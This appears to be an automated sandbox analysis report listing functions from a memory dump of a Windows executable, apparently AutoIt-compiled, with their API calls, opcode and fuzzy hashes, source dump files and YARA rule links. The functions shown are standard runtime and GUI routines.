Instruction ID: c6e175a38d2394064c9302de04ec1b9a3fb96d277401030c2caca8f5f8dc1a03
Opcode Fuzzy Hash: dd3ccbe3a126c9156f48106d8c28886fb8865704d1612f0b346bda21778e8571
Instruction Fuzzy Hash: 41112875504B059FD330CF05D888F62BBF8EB45360F11891EE4AB86990D771B985CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A044A4, Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00A044B0

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: c13197e24067aeb628276ab8890acacc37e68b5f81e3f291ef2a70f2039315cb
Instruction ID: 2b72d2c82da7e94adf4afcbbdaa45802bff844817a544f72c8e91b4275b04ba5
Opcode Fuzzy Hash: c13197e24067aeb628276ab8890acacc37e68b5f81e3f291ef2a70f2039315cb
Instruction Fuzzy Hash: C3018476E00108CFDF20CB84D884FBDB3FAEB51360B158429E95A9B640D731ED41CB52

Uniqueness

Uniqueness Score: -1.00%

Function 009E556A, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b2c5c6d962590aefe1ceff29007fee6d6c6150a5ee9bc41ee10c86ab095ad70
Instruction ID: 195b7b6384a4f5d8442a40e774f5152ca4c710610e9f1460ca1941a06c032845
Opcode Fuzzy Hash: 4b2c5c6d962590aefe1ceff29007fee6d6c6150a5ee9bc41ee10c86ab095ad70
Instruction Fuzzy Hash: 82F0F432401B845AD2332A978C0176B36AD8FC237DF164A15F9A4A10D2CE389D018FA0

Uniqueness

Uniqueness Score: -1.00%

Function 009E332F, Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

__initp_misc_cfltcvt_tab.LIBCMT ref: 009E3354

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: __initp_misc_cfltcvt_tab
String ID:
API String ID: 2831292245-0
Opcode ID: cfac13a67fa61d2f5a15bb37196025d905cb660021cad32e364e5d868fb285a5
Instruction ID: 88fdc14c68e9fb121fd0b71b554f40e25f46375b1c6000c8e58100e5fa7b0c1b
Opcode Fuzzy Hash: cfac13a67fa61d2f5a15bb37196025d905cb660021cad32e364e5d868fb285a5
Instruction Fuzzy Hash: B0F0F636284381BDEA2677A3EC0BF1533A8FF85726F655429F1005D0E1DEA58C808225

Uniqueness

Uniqueness Score: -1.00%

Function 00A045A9, Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00A045B4

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 93251106989ae20838f8ffaef143be4c8ad845fed6191f347ce2e48eb88b9e3b
Instruction ID: 161acb364dd885dfc4dd7c89e193e382d47bdb7b8f627b41e16a90b7b269c089
Opcode Fuzzy Hash: 93251106989ae20838f8ffaef143be4c8ad845fed6191f347ce2e48eb88b9e3b
Instruction Fuzzy Hash: 23F03076A00158CADF209FD5E845FAAB3E8EB41361F144429E556D6500D7329C409B52

Uniqueness

Uniqueness Score: -1.00%

Function 00A02587, Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00A02592

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 9a062a8e52171e7484b9d8a065de5d0ffe64b7b1370387547919e38f348e20c6
Instruction ID: ec9f70c9aa2825059dfeced1b6d3464be16c5a8d85ad5abaf005c6f996674b9a
Opcode Fuzzy Hash: 9a062a8e52171e7484b9d8a065de5d0ffe64b7b1370387547919e38f348e20c6
Instruction Fuzzy Hash: 3CF02BB1B0424E9EE7349BB4F80DF72FBE8DB51316F20042EE085C04C0DB7668849762

Uniqueness

Uniqueness Score: -1.00%

Function 009E09D5, Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009E09F4

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 8efd9c02a6d5044fc6ef6faf4dfedaf7c7cf9cc9fdbbc331166504c9c5fecd92
Instruction ID: 775895fe47baf9de3e394de5f32e341f8315b50b82343a8e83304e38be60fe5a
Opcode Fuzzy Hash: 8efd9c02a6d5044fc6ef6faf4dfedaf7c7cf9cc9fdbbc331166504c9c5fecd92
Instruction Fuzzy Hash: ECE0867BA05128AAD721E2DAAC09FFB7B6CDFC57B1F00007AF60CC54459951A88586B1

Uniqueness

Uniqueness Score: -1.00%

Function 009C4FAA, Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,009FDD16,?,00A862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 009C4FDE

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: e1bc8fceb29513975b861b1365650a41b17c2c94d1ea8ba7515f0105afbcc4e2
Instruction ID: ed6780b3e2fb27ef4d5887f508dc067978d11d4251120ad64757e0680ad90084
Opcode Fuzzy Hash: e1bc8fceb29513975b861b1365650a41b17c2c94d1ea8ba7515f0105afbcc4e2
Instruction Fuzzy Hash: AEF03975A05712CFCB349F64E8A4E12BBF5BF043293208A3EE5D682610C732A840DF42

Uniqueness

Uniqueness Score: -1.00%

Function 009C44CB, Relevance: 1.5, APIs: 1, Instructions: 27windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000002,?), ref: 009C4527

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: b71344305053cde6df575d86fff47bd079ae179494f13047a5d5ff85108cb218
Instruction ID: 13bb3dedb617499bf94dfa353237409cc6665aaed8931081cff8027125819c28
Opcode Fuzzy Hash: b71344305053cde6df575d86fff47bd079ae179494f13047a5d5ff85108cb218
Instruction Fuzzy Hash: 00F0A771D003489FE753CBA4EC49BE67B7C970130DF0401EAE20896156D7760789CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A249FF, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(?,00000026,?,?,?), ref: 00A24A18

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 6911b6a410e1cd484596ba75d3ea2bb1d3749ee309a13e356e1744ea425d2124
Instruction ID: 8a517d548a4196f6f99ab08cb387db48ffa772b2253ceab0c7fe27544e0a41a2
Opcode Fuzzy Hash: 6911b6a410e1cd484596ba75d3ea2bb1d3749ee309a13e356e1744ea425d2124
Instruction Fuzzy Hash: 2BD05B6790111C3EDB5096F4FC0DDF77B6CDB421A6F0002A2F45CC2451D9266D4586F1

Uniqueness

Uniqueness Score: -1.00%

Function 00A23696, Relevance: 1.5, APIs: 1, Instructions: 21fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00A23595: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,?,?,00A236A2,?,?,?,009FE060,00A770A0,00000002,?,?), ref: 00A23613

WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,009FE060,00A770A0,00000002,?,?,?,?), ref: 00A236B0

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: File$PointerWrite
String ID:
API String ID: 539440098-0
Opcode ID: 5177587e53d05cf0ae089de67624b0be2d0dd49fec84e892b72c4ab6ed8277a8
Instruction ID: 0ef559b50468b1ada732aeb8cf43a52d89c83e6132133d5cd40f1f64e52053f8
Opcode Fuzzy Hash: 5177587e53d05cf0ae089de67624b0be2d0dd49fec84e892b72c4ab6ed8277a8
Instruction Fuzzy Hash: D3E04F3A000218FFDB209F94DD05EDABBBCEB05360F000516F54445410D7B2AB149BA0

Uniqueness

Uniqueness Score: -1.00%

Function 009C5DCF, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,009C5921,?,009C6C37), ref: 009C5DEF

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: f4a8332c3f06f8871cfdc728de1d5a3f51aca7068b41b59b2fa3f9e2b45d82b9
Instruction ID: 72c26fc7f5387e58fe6073927c20d8d7242172934c6ff4ef5c9654f2343aba48
Opcode Fuzzy Hash: f4a8332c3f06f8871cfdc728de1d5a3f51aca7068b41b59b2fa3f9e2b45d82b9
Instruction Fuzzy Hash: 16E0B679904B01DFD6314F1AE808952FFF8FEE13B13218A2ED0E6815A0D371648ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 009C5DAE, Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000001,?,?,?,009FE16B,?,?,00000000,?,?), ref: 009C5DBF

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 3cc933c87bdf31279a904167a9802fe243b83af58b895433522c1714f8fe6418
Instruction ID: 0f543b306e2e036cf9f123b31260133ac37bc2abaad4ef4bfccdef1dc01c9395
Opcode Fuzzy Hash: 3cc933c87bdf31279a904167a9802fe243b83af58b895433522c1714f8fe6418
Instruction Fuzzy Hash: B6D09E79641108BFE600C7C0DC46FFA7B7CD746765F100195F6045559092B379408761

Uniqueness

Uniqueness Score: -1.00%

Function 00A24CD3, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00A24FAB), ref: 00A24CD4

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: cdae64810a12c4a37e4bac5a9f715bec477f57ff08faff31914b14383541afd9
Instruction ID: d4aa4085baaba4a61cc26eb6947dca67b0f6e047ef25129bc0862dc8c21a549b
Opcode Fuzzy Hash: cdae64810a12c4a37e4bac5a9f715bec477f57ff08faff31914b14383541afd9
Instruction Fuzzy Hash: 8CB09B6C215510095D14973C2508095230178577A57D41790D475450E293354807D510

Uniqueness

Uniqueness Score: -1.00%

Function 00A2D2E6, Relevance: 1.4, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000002,00000000), ref: 00A2D46A

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 279f0592cd87561844e8f1f220e7cdf35576c7f2d8f7f00917c8e8fb191bbbc0
Instruction ID: 6f0d0dbedfab60731c956e0b8ca9e0598d8f6418ace61b1afbe6c701e1cbff90
Opcode Fuzzy Hash: 279f0592cd87561844e8f1f220e7cdf35576c7f2d8f7f00917c8e8fb191bbbc0
Instruction Fuzzy Hash: FE7170346083128FC714EF29D591F6AB7E0AFC8314F04496DF8969B2A2DB70ED49CB52

Uniqueness

Uniqueness Score: -1.00%

Function 009E0E48, Relevance: 1.4, APIs: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00A3D12A,?,?,?,?,?), ref: 009E0EF7

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f10dbbf5c1e9ddb9767f051691c1ed2ff7114a92833def6023f171be54cfd7b8
Instruction ID: b401ed4f7c0ee5e31bda860b6e665a9b48d2b9ced779c17ae4f965d42938cb22
Opcode Fuzzy Hash: f10dbbf5c1e9ddb9767f051691c1ed2ff7114a92833def6023f171be54cfd7b8
Instruction Fuzzy Hash: 24314971A00145EFC71ADF5AD480969F7BAFF99310B688AA9E40ACB651D770EDC0CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A2BE98, Relevance: 1.3, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00A23D4E: FindFirstFileW.KERNELBASE(?,?), ref: 00A23DC5
Part of subcall function 00A23D4E: DeleteFileW.KERNEL32(?,?,?,?), ref: 00A23E15
Part of subcall function 00A23D4E: FindNextFileW.KERNEL32(00000000,00000010), ref: 00A23E26
Part of subcall function 00A23D4E: FindClose.KERNEL32(00000000), ref: 00A23E3D

GetLastError.KERNEL32 ref: 00A2BEBA

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFind$CloseDeleteErrorFirstLastNext
String ID:
API String ID: 2191629493-0
Opcode ID: 212adf4b7e7d3a9acd32b5b5cf6f2ec0a0ca649a58e6a533c9afbe9e42d3b84a
Instruction ID: 7dc10140c7c9f8e4d6ee6faf4140311bdc9aa4aa8625687bb9b591766bb8c81d
Opcode Fuzzy Hash: 212adf4b7e7d3a9acd32b5b5cf6f2ec0a0ca649a58e6a533c9afbe9e42d3b84a
Instruction Fuzzy Hash: DFF082362105109FCB10EF59D855F6AB7E4AF89B20F05841DF94A8B352CB74BC01CB91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00A4CDAC, Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 647windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 009C2612: GetWindowLongW.USER32 ref: 009C2623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00A4CE50
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A4CE91
GetWindowLongW.USER32 ref: 00A4CED6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A4CF00
SendMessageW.USER32 ref: 00A4CF29
GetKeyState.USER32(00000011), ref: 00A4CFC2
GetKeyState.USER32(00000009), ref: 00A4CFCF
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A4CFE5
GetKeyState.USER32(00000010), ref: 00A4CFEF
SendMessageW.USER32(?,0000110A,00000009,?), ref: 00A4D018
SendMessageW.USER32 ref: 00A4D03F
SendMessageW.USER32(?,00001030,?,00A4B602), ref: 00A4D145
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00A4D15B
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00A4D16E
SetCapture.USER32(?), ref: 00A4D177
ClientToScreen.USER32 ref: 00A4D1DC
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00A4D1E9
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00A4D203
ReleaseCapture.USER32(?,?,?), ref: 00A4D20E
GetCursorPos.USER32(?), ref: 00A4D248
ScreenToClient.USER32 ref: 00A4D255
SendMessageW.USER32(?,00001012,00000000,?), ref: 00A4D2B1
SendMessageW.USER32 ref: 00A4D2DF
SendMessageW.USER32(?,00001111,00A867B0,?), ref: 00A4D31C
SendMessageW.USER32 ref: 00A4D34B
SendMessageW.USER32(?,0000110B,00000009,00A867B0), ref: 00A4D36C
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00A4D37B
GetCursorPos.USER32(?), ref: 00A4D39B
ScreenToClient.USER32 ref: 00A4D3A8
GetParent.USER32(?), ref: 00A4D3C8
SendMessageW.USER32(?,00001012,00A867B0,?), ref: 00A4D431
SendMessageW.USER32 ref: 00A4D462
ClientToScreen.USER32 ref: 00A4D4C0
TrackPopupMenuEx.USER32(?,00A867B0,?,?,?,00A867B0), ref: 00A4D4F0
SendMessageW.USER32(?,00001111,00000000,?), ref: 00A4D51A
SendMessageW.USER32 ref: 00A4D53D
ClientToScreen.USER32 ref: 00A4D58F
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00A4D5C3

Part of subcall function 009C25DB: GetWindowLongW.USER32 ref: 009C25EC

GetWindowLongW.USER32 ref: 00A4D65F

Strings

@GUI_DRAGID, xrefs: 00A4D1AA
F, xrefs: 00A4D543

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F
API String ID: 3429851547-4164748364
Opcode ID: eb7cb8d500542b07580309e52ab279780f75fd81d7673e0417e0c517d9296236
Instruction ID: c18f99a4310deacd2879e0bc3776cddc4c0e3a358e991fc9c26d695565e5a956
Opcode Fuzzy Hash: eb7cb8d500542b07580309e52ab279780f75fd81d7673e0417e0c517d9296236
Instruction Fuzzy Hash: 0B42CD38205341AFD725CF68C849FAABBE5FF89324F24051DF699972A0C731E855CB92

Uniqueness

Uniqueness Score: -1.00%

Function 009F5CCC, Relevance: 49.2, APIs: 22, Strings: 6, Instructions: 176libraryloaderCOMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32(00A84388,00000000,00A84388,?,?,?,?,?,?,009EA54D,00A84388,Microsoft Visual C++ Runtime Library,00012010), ref: 009F5CF4
LoadLibraryExW.KERNEL32(USER32.DLL,00A84388,00000800,?,?,?,?,?,?,009EA54D,00A84388,Microsoft Visual C++ Runtime Library,00012010), ref: 009F5D1A
GetLastError.KERNEL32(?,?,?,?,?,?,009EA54D,00A84388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,00A843BA,00000104), ref: 009F5D26
LoadLibraryExW.KERNEL32(USER32.DLL,00A84388,00A84388,?,?,?,?,?,?,009EA54D,00A84388,Microsoft Visual C++ Runtime Library,00012010), ref: 009F5D3C
GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 009F5D52
EncodePointer.KERNEL32(00000000,?,?,?,?,?,?,009EA54D,00A84388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,00A843BA), ref: 009F5D61
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 009F5D6E
EncodePointer.KERNEL32(00000000,?,?,?,?,?,?,009EA54D,00A84388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,00A843BA), ref: 009F5D75
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 009F5D82
EncodePointer.KERNEL32(00000000,?,?,?,?,?,?,009EA54D,00A84388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,00A843BA), ref: 009F5D89
GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 009F5D96
EncodePointer.KERNEL32(00000000,?,?,?,?,?,?,009EA54D,00A84388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,00A843BA), ref: 009F5D9D
GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 009F5DAE
EncodePointer.KERNEL32(00000000,?,?,?,?,?,?,009EA54D,00A84388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,00A843BA), ref: 009F5DB5
IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,009EA54D,00A84388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,00A843BA,00000104), ref: 009F5DBF
OutputDebugStringW.KERNEL32(?,?,?,?,?,?,?,009EA54D,00A84388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,00A843BA), ref: 009F5DD1
DecodePointer.KERNEL32(?,?,?,?,?,?,009EA54D,00A84388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,00A843BA,00000104), ref: 009F5DEF
DecodePointer.KERNEL32(00000000,?,?,?,?,?,?,009EA54D,00A84388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,00A843BA), ref: 009F5E11
DecodePointer.KERNEL32(?,?,?,?,?,?,009EA54D,00A84388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,00A843BA,00000104), ref: 009F5E1C
DecodePointer.KERNEL32(00000000,?,?,?,?,?,?,009EA54D,00A84388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,00A843BA), ref: 009F5E61
DecodePointer.KERNEL32(00000000,?,?,?,?,?,?,009EA54D,00A84388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,00A843BA), ref: 009F5E79
DecodePointer.KERNEL32(?,?,?,?,?,?,009EA54D,00A84388,Microsoft Visual C++ Runtime Library,00012010,?,?,?,?,00A843BA,00000104), ref: 009F5E8D

Strings

USER32.DLL, xrefs: 009F5D15, 009F5D37
GetProcessWindowStation, xrefs: 009F5DA8
GetUserObjectInformationW, xrefs: 009F5D8B
MessageBoxW, xrefs: 009F5D4C
GetLastActivePopup, xrefs: 009F5D77
GetActiveWindow, xrefs: 009F5D63

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Pointer$DecodeEncode$AddressProc$LibraryLoad$DebugDebuggerErrorLastOutputPresentString
